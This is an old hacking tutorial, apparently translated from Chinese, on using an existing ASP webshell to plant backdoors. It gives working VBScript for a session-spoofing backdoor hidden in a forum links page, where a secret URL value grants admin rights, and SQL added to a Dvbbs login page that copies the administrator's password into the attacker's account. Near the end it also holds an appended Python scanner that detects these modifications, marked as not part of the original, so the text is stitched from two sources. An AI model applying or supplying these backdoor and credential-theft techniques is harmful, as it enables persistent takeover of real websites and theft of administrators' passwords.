Using an ASP Trojan to gain the highest privileges

ID MYHACK58:6220066698
Type myhack58
Reporter Anonymous
Modified 2006-01-25T00:00:00



With the Dvbbs (Dynamic Network) forum upload vulnerability that spread so widely a while ago, and the recent string of upload vulnerabilities exposed in various ASP systems, many readers probably hold webshells on a good number of compromised hosts. What people do with these hosts varies from person to person: some go on to escalate privileges and intrude further; some just look around, leave the Trojan in place and then forget about it; and for others, once the novelty of the webshell wears off, the mystery and allure of the admin backend grows considerably.

In fact, for a very powerful system, getting into the backend amounts to getting a good backdoor. But in most newer ASP systems the passwords are MD5-hashed and then checked by strict verification routines. Is there really no way to break through these limits? No! Today I will explain how to break through these restrictions and go straight into the backend. Those who already have Trojans in place can follow along............

Session spoofing

First, briefly, the authentication principle of a typical ASP system. In general, when the administrator enters an account and password on the backend login page, the program takes the submitted user name and password and looks in the administrator table of the database for a matching record; if one is found, you are considered an administrator and given a session value that represents your identity. Alternatively, the program takes the user name and password you submitted, fetches the administrator's account and password from the administrator table and compares them; if they are equal, you are given a session value representing your identity, as above. After that, every admin page you open first checks your session value: if you are an administrator you are let through, and if not you are sent back to the login page or shown some odd warning, depending on the programmer's personal preference.

Knowing the principle, one idea is to use our ASP Trojan to modify the program and obtain an administrator session. Although we do not have the administrator password, we can then move around the backend unhindered. I call this method session spoofing. Space is limited and not every system can be described in detail, so this article uses only the Power Article System as an example.

Power Article System 3.51 is shown in Figure 1:

Figure 1

In fact, this works against every version of the Power Article System, including PowerEasy (Dongyi). You can try it out yourself.

Let's first look at its verification code. In Power Article 3.51 the verification page is Admin_ChkLogin.asp, and its verification code is as follows:

    ............
    else
        rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")
        rs("LastLoginTime")=now()
        rs("LoginTimes")=rs("LoginTimes")+1
        rs.update
        session.Timeout=SessionTimeout
        session("AdminName")=rs("username")
        rs.close
        set rs=nothing
        call CloseConn()
        Response.Redirect "Admin_Index.asp"

The ellipsis at the front stands for the checks that reject an incorrect user name or password. At the else branch, if the user name and password are correct, it gives you two session values:

    session.Timeout=SessionTimeout
    session("AdminName")=rs("username")

Now let's see how the other management pages verify the session. admin_index.asp begins like this:

It looks very tight, but note that it only checks one session value, AdminName. As long as our session contains an AdminName, won't we pass? So let's begin. First get its administrator account; I don't need to teach you this, do I? Browse around the website, or download its database directly and look. Then we find a page to modify. I pick a page that few people visit and that has a lot of content, FriendSite.asp (the links page); this way it is very hard for the administrator to notice. Use the ASP Trojan's edit function to edit its content and, somewhere inconspicuous in the page, add the following lines:

    dim id
    id=trim(request("qwe"))
    if id="120" then
        session("AdminName")="admin" ' hypothetical; in practice change this to the administrator account you want to obtain
    end if

I'll briefly explain what these lines mean: they read a value from the address bar, and if that value is 120 the system gives us a session whose AdminName is admin. Look at Figure 2:


Figure 2

See anything unusual? No? It is still a normal page. But now enter the address of its admin backend home page in the address bar and take a look: aren't we in? See Figure 3:


Figure 3

Heh, don't do anything bad with this............

Summary: first obtain the administrator account, then find the verification page and write our backdoor according to what it verifies. Different systems verify in different ways; for example, the Qingchuang article system checks not only your user name but also your level. The general idea is still the same, though: whatever it verifies, we add.

Password theft

The method above is feeble against the Dvbbs forum and other forums, because forums are more interactive and so put much more thought into verification. Take Dvbbs as an example: to log in to the backend, it checks that you have already logged in at the front end, and if not it returns an error page. After you log in at the front end, the system gives you a session that records your CacheName and your ID, and when you log in to the backend it compares them to check that your front-end and backend identities are consistent; if they match you pass, otherwise you are kicked out. Faced with such strict verification, is there no way for us to get into the backend? Right, there isn't (who threw that egg at me? What a waste). But we can think of a new approach: since verification is so strict, what if I take the password and walk in openly? So the new idea here is to get the plaintext password. When is the plaintext password available? That's right, when the administrator logs in. So that is where we tamper: have the login hand the password over to us, and then we log in with it. Heh, rather like a sniffer, isn't it? A few months ago, out in the field, my friend Latent Dragon and I used a hardware sniffer together with people from the provincial Network Security Bureau to take down an illegal movie site: a full 4000G of hard disk and dozens of servers. In a word: cool.

So let's modify its program. Edit login.asp and add the following lines:

    if not isnull(trim(request("username"))) then
        if request("username")="admin" then
            sql="update [Dv_User] set UserEmail=(select userpassword from [Dv_User] where username='"&request("username")&"') where UserName='aweige'"
            conn.execute(sql)
        end if
    end if

These lines mean: if admin (an assumption; in practice use the actual administrator name) logs in successfully, the database is updated and his password is put in the E-mail field of my profile. Of course, you must first register a user name on the forum. The result is shown in Figure 4:


Figure 4

Also, in Dvbbs versions below 7.0 the default administrator table name differs slightly from 7.0 and above, so in practice this cannot be applied mechanically.

Postscript:

For the two methods above I have so far not been able to think of an effective solution: once someone has put a Trojan on your site, you simply have no way to stop them from inserting code. If anyone has a better solution, remember to tell me.
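A source-tree check that flags both modifications described above, as an added example that is not part of the original article. It assumes Admin_ChkLogin.asp is the only file allowed to assign session("AdminName"); the rule names are hypothetical, and the sample tree is constructed from the statements quoted on this page.

```python
import re

# Assumption: only the login check may set the admin session value; the
# page names Admin_ChkLogin.asp for this system. Adjust per application.
ALLOWED_WRITERS = {"admin_chklogin.asp"}
SPLIT = re.compile(r"\bthen\b|\belse\b|:", re.I)
ASSIGN = re.compile(r'^\s*session\s*\(\s*"AdminName"\s*\)\s*=', re.I)
PW_COPY = re.compile(r"\bupdate\b.*\bset\b.*=\s*\(\s*select\s+userpassword\b", re.I)

def strip_comment(line):
    """Drop a VBScript ' comment, ignoring quotes inside "..." strings."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line

def scan(files):
    """Return (file, line number, rule) for each suspicious statement."""
    findings = []
    for name, text in files.items():
        for no, raw in enumerate(text.splitlines(), 1):
            line = strip_comment(raw)
            # An assignment starts a statement; a comparison follows If/And/Or.
            if name.lower() not in ALLOWED_WRITERS and any(
                    ASSIGN.match(seg) for seg in SPLIT.split(line)):
                findings.append((name, no, "session-identity-write"))
            if PW_COPY.search(line):
                findings.append((name, no, "password-copy-sql"))
    return findings

# Constructed sample tree: statements quoted on this page plus one
# constructed session comparison that must not be flagged.
SAMPLE = {
    "Admin_ChkLogin.asp": 'session("AdminName")=rs("username")',
    "Admin_Index.asp": 'if session("AdminName")="" then response.redirect "x.asp"',
    "FriendSite.asp": 'dim id\nid=trim(request("qwe"))\n'
                      'if id="120" then session("AdminName")="admin" \' note\nend if',
    "login.asp": 'sql="update [Dv_User] set UserEmail=(select userpassword '
                 'from [Dv_User] where username=\'"&request("username")&"\') '
                 'where UserName=\'aweige\'"',
}

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

Run against a known-good copy of the application first, so that any legitimate writers of the session value can be added to the allow list before the check is scheduled against the live web root.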

In addition, I hope you won't go and vandalize sites; that is something I really don't want to see. Good luck to all network administrators; I hope you won't run into a cracker.